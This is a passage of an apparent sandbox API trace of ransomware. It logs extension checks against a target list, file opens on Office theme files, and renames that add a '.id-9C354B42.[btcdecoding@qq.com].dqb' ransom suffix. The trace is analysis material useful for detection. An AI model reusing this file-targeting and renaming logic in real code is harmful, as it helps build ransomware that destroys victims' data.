77 [0270.262] lstrlenW (lpString=".doc") returned 4 [0270.262] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0270.262] lstrlenW (lpString=".docx") returned 5 [0270.262] lstrcmpiW (lpString1=".docx", lpString2="E.INF") returned -1 [0270.262] lstrlenW (lpString=".pdf") returned 4 [0270.262] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0270.262] lstrlenW (lpString=".xls") returned 4 [0270.262] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0270.262] lstrlenW (lpString=".xlsx") returned 5 [0270.262] lstrcmpiW (lpString1=".xlsx", lpString2="E.INF") returned -1 [0270.262] lstrlenW (lpString=".ppt") returned 4 [0270.262] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0270.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 77 [0270.262] lstrlenW (lpString=".zip") returned 4 [0270.262] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0270.262] lstrlenW (lpString=".rar") returned 4 [0270.262] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0270.262] lstrlenW (lpString=".bz2") returned 4 [0270.262] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0270.262] lstrlenW (lpString=".7z") returned 3 [0270.262] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0270.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 77 [0270.262] lstrlenW (lpString=".dbf") returned 4 [0270.262] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0270.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 77 [0270.262] lstrlenW (lpString=".1cd") returned 4 [0270.262] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0270.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 77 [0270.262] lstrlenW (lpString=".jpg") returned 4 [0270.262] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0270.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 77 [0270.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 77 [0270.263] lstrlenW (lpString=".doc") returned 4 [0270.263] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0270.263] lstrlenW (lpString=".docx") returned 5 [0270.263] lstrcmpiW (lpString1=".docx", lpString2="E.INF") returned -1 [0270.263] lstrlenW (lpString=".pdf") returned 4 [0270.263] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0270.263] lstrlenW (lpString=".xls") returned 4 [0270.263] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0270.263] lstrlenW (lpString=".xlsx") returned 5 [0270.263] lstrcmpiW (lpString1=".xlsx", lpString2="E.INF") returned -1 [0270.263] lstrlenW (lpString=".ppt") returned 4 [0270.263] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0270.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 77 [0270.263] lstrlenW (lpString=".zip") returned 4 [0270.263] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0270.263] lstrlenW (lpString=".rar") returned 4 [0270.263] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0270.263] lstrlenW (lpString=".bz2") returned 4 [0270.263] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0270.263] lstrlenW (lpString=".7z") returned 3 [0270.263] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0270.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 77 [0270.263] lstrlenW (lpString=".dbf") returned 4 [0270.263] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0270.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 77 [0270.263] lstrlenW (lpString=".1cd") returned 4 [0270.263] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0270.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 77 [0270.263] lstrlenW (lpString=".jpg") returned 4 [0270.263] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0270.264] lstrcmpiW (lpString1=".ELM", lpString2=".dqb") returned 1 [0270.264] lstrlenW (lpString="ECHO.ELM") returned 8 [0270.264] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.elm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0270.265] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x360ff1c | out: lpFileSize=0x360ff1c*=45262) returned 1 [0270.265] CloseHandle (hObject=0x1f4) returned 1 [0270.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.elm")) returned 0x20 [0270.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.elm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.265] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 69 [0270.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 69 [0270.265] lstrlenW (lpString=".doc") returned 4 [0270.265] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0270.265] lstrlenW (lpString=".docx") returned 5 [0270.265] lstrcmpiW (lpString1=".docx", lpString2="O.ELM") returned -1 [0270.265] lstrlenW (lpString=".pdf") returned 4 [0270.265] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0270.266] lstrlenW (lpString=".xls") returned 4 [0270.266] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0270.266] lstrlenW (lpString=".xlsx") returned 5 [0270.266] lstrcmpiW (lpString1=".xlsx", lpString2="O.ELM") returned -1 [0270.266] lstrlenW (lpString=".ppt") returned 4 [0270.266] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0270.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 69 [0270.266] lstrlenW (lpString=".zip") returned 4 [0270.266] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0270.266] lstrlenW (lpString=".rar") returned 4 [0270.266] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0270.266] lstrlenW (lpString=".bz2") returned 4 [0270.266] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0270.266] lstrlenW (lpString=".7z") returned 3 [0270.266] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0270.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 69 [0270.266] lstrlenW (lpString=".dbf") returned 4 [0270.266] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0270.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 69 [0270.266] lstrlenW (lpString=".1cd") returned 4 [0270.266] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0270.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 69 [0270.266] lstrlenW (lpString=".jpg") returned 4 [0270.266] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0270.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 69 [0270.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 69 [0270.266] lstrlenW (lpString=".doc") returned 4 [0270.266] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0270.266] lstrlenW (lpString=".docx") returned 5 [0270.266] lstrcmpiW (lpString1=".docx", lpString2="O.ELM") returned -1 [0270.266] lstrlenW (lpString=".pdf") returned 4 [0270.266] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0270.267] lstrlenW (lpString=".xls") returned 4 [0270.267] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0270.267] lstrlenW (lpString=".xlsx") returned 5 [0270.267] lstrcmpiW (lpString1=".xlsx", lpString2="O.ELM") returned -1 [0270.267] lstrlenW (lpString=".ppt") returned 4 [0270.267] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0270.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 69 [0270.267] lstrlenW (lpString=".zip") returned 4 [0270.267] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0270.267] lstrlenW (lpString=".rar") returned 4 [0270.267] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0270.267] lstrlenW (lpString=".bz2") returned 4 [0270.267] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0270.267] lstrlenW (lpString=".7z") returned 3 [0270.267] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0270.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 69 [0270.267] lstrlenW (lpString=".dbf") returned 4 [0270.267] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0270.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 69 [0270.267] lstrlenW (lpString=".1cd") returned 4 [0270.267] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0270.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 69 [0270.267] lstrlenW (lpString=".jpg") returned 4 [0270.267] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0270.267] lstrcmpiW (lpString1=".INF", lpString2=".dqb") returned 1 [0270.267] lstrlenW (lpString="ECHO.INF") returned 8 [0270.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0270.268] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x360ff1c | out: lpFileSize=0x360ff1c*=503) returned 1 [0270.268] CloseHandle (hObject=0x1f4) returned 1 [0270.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.inf")) returned 0x20 [0270.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.inf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.268] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 69 [0270.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 69 [0270.268] lstrlenW (lpString=".doc") returned 4 [0270.268] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0270.268] lstrlenW (lpString=".docx") returned 5 [0270.268] lstrcmpiW (lpString1=".docx", lpString2="O.INF") returned -1 [0270.268] lstrlenW (lpString=".pdf") returned 4 [0270.268] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0270.268] lstrlenW (lpString=".xls") returned 4 [0270.268] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0270.268] lstrlenW (lpString=".xlsx") returned 5 [0270.268] lstrcmpiW (lpString1=".xlsx", lpString2="O.INF") returned -1 [0270.268] lstrlenW (lpString=".ppt") returned 4 [0270.268] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0270.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 69 [0270.268] lstrlenW (lpString=".zip") returned 4 [0270.268] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0270.268] lstrlenW (lpString=".rar") returned 4 [0270.268] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0270.268] lstrlenW (lpString=".bz2") returned 4 [0270.268] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0270.268] lstrlenW (lpString=".7z") returned 3 [0270.269] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0270.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 69 [0270.269] lstrlenW (lpString=".dbf") returned 4 [0270.269] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0270.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 69 [0270.269] lstrlenW (lpString=".1cd") returned 4 [0270.269] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0270.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 69 [0270.269] lstrlenW (lpString=".jpg") returned 4 [0270.269] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0270.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 69 [0270.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 69 [0270.269] lstrlenW (lpString=".doc") returned 4 [0270.269] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0270.269] lstrlenW (lpString=".docx") returned 5 [0270.269] lstrcmpiW (lpString1=".docx", lpString2="O.INF") returned -1 [0270.269] lstrlenW (lpString=".pdf") returned 4 [0270.269] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0270.269] lstrlenW (lpString=".xls") returned 4 [0270.269] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0270.269] lstrlenW (lpString=".xlsx") returned 5 [0270.269] lstrcmpiW (lpString1=".xlsx", lpString2="O.INF") returned -1 [0270.269] lstrlenW (lpString=".ppt") returned 4 [0270.269] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0270.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 69 [0270.269] lstrlenW (lpString=".zip") returned 4 [0270.269] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0270.269] lstrlenW (lpString=".rar") returned 4 [0270.269] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0270.269] lstrlenW (lpString=".bz2") returned 4 [0270.269] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0270.269] lstrlenW (lpString=".7z") returned 3 [0270.270] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0270.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 69 [0270.270] lstrlenW (lpString=".dbf") returned 4 [0270.270] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0270.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 69 [0270.270] lstrlenW (lpString=".1cd") returned 4 [0270.270] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0270.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 69 [0270.270] lstrlenW (lpString=".jpg") returned 4 [0270.270] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0270.270] lstrcmpiW (lpString1=".ELM", lpString2=".dqb") returned 1 [0270.270] lstrlenW (lpString="ECLIPSE.ELM") returned 11 [0270.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.elm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0270.271] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x360ff1c | out: lpFileSize=0x360ff1c*=118577) returned 1 [0270.271] CloseHandle (hObject=0x1f4) returned 1 [0270.271] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.elm")) returned 0x20 [0270.271] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.elm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.271] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 75 [0270.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 75 [0270.271] lstrlenW (lpString=".doc") returned 4 [0270.271] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0270.271] lstrlenW (lpString=".docx") returned 5 [0270.271] lstrcmpiW (lpString1=".docx", lpString2="E.ELM") returned -1 [0270.271] lstrlenW (lpString=".pdf") returned 4 [0270.271] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0270.271] lstrlenW (lpString=".xls") returned 4 [0270.271] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0270.271] lstrlenW (lpString=".xlsx") returned 5 [0270.271] lstrcmpiW (lpString1=".xlsx", lpString2="E.ELM") returned -1 [0270.271] lstrlenW (lpString=".ppt") returned 4 [0270.272] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0270.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 75 [0270.272] lstrlenW (lpString=".zip") returned 4 [0270.272] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0270.272] lstrlenW (lpString=".rar") returned 4 [0270.272] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0270.272] lstrlenW (lpString=".bz2") returned 4 [0270.272] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0270.272] lstrlenW (lpString=".7z") returned 3 [0270.272] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0270.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 75 [0270.272] lstrlenW (lpString=".dbf") returned 4 [0270.272] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0270.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 75 [0270.272] lstrlenW (lpString=".1cd") returned 4 [0270.272] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0270.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 75 [0270.272] lstrlenW (lpString=".jpg") returned 4 [0270.272] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0270.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 75 [0270.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 75 [0270.272] lstrlenW (lpString=".doc") returned 4 [0270.272] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0270.272] lstrlenW (lpString=".docx") returned 5 [0270.272] lstrcmpiW (lpString1=".docx", lpString2="E.ELM") returned -1 [0270.272] lstrlenW (lpString=".pdf") returned 4 [0270.272] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0270.272] lstrlenW (lpString=".xls") returned 4 [0270.272] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0270.272] lstrlenW (lpString=".xlsx") returned 5 [0270.272] lstrcmpiW (lpString1=".xlsx", lpString2="E.ELM") returned -1 [0270.272] lstrlenW (lpString=".ppt") returned 4 [0270.272] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0270.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 75 [0270.273] lstrlenW (lpString=".zip") returned 4 [0270.273] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0270.273] lstrlenW (lpString=".rar") returned 4 [0270.273] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0270.273] lstrlenW (lpString=".bz2") returned 4 [0270.273] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0270.273] lstrlenW (lpString=".7z") returned 3 [0270.273] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0270.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 75 [0270.273] lstrlenW (lpString=".dbf") returned 4 [0270.273] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0270.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 75 [0270.273] lstrlenW (lpString=".1cd") returned 4 [0270.273] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0270.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 75 [0270.273] lstrlenW (lpString=".jpg") returned 4 [0270.273] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0270.273] lstrcmpiW (lpString1=".INF", lpString2=".dqb") returned 1 [0270.273] lstrlenW (lpString="ECLIPSE.INF") returned 11 [0270.273] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0270.274] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x360ff1c | out: lpFileSize=0x360ff1c*=595) returned 1 [0270.274] CloseHandle (hObject=0x1f4) returned 1 [0270.274] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.inf")) returned 0x20 [0270.274] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.inf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.274] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF") returned 75 [0270.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF") returned 75 [0270.274] lstrlenW (lpString=".doc") returned 4 [0270.274] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0270.274] lstrlenW (lpString=".docx") returned 5 [0270.274] lstrcmpiW (lpString1=".docx", lpString2="E.INF") returned -1 [0270.274] lstrlenW (lpString=".pdf") returned 4 [0270.275] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0270.275] lstrlenW (lpString=".xls") returned 4 [0270.275] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0270.275] lstrlenW (lpString=".xlsx") returned 5 [0270.275] lstrcmpiW (lpString1=".xlsx", lpString2="E.INF") returned -1 [0270.275] lstrlenW (lpString=".ppt") returned 4 [0270.275] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0270.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF") returned 75 [0270.275] lstrlenW (lpString=".zip") returned 4 [0270.275] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0270.275] lstrlenW (lpString=".rar") returned 4 [0270.275] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0270.275] lstrlenW (lpString=".bz2") returned 4 [0270.275] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0270.275] lstrlenW (lpString=".7z") returned 3 [0270.275] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0270.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF") returned 75 [0271.284] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0271.287] MoveFileW (lpExistingFileName="C:\\Program Files\\Common 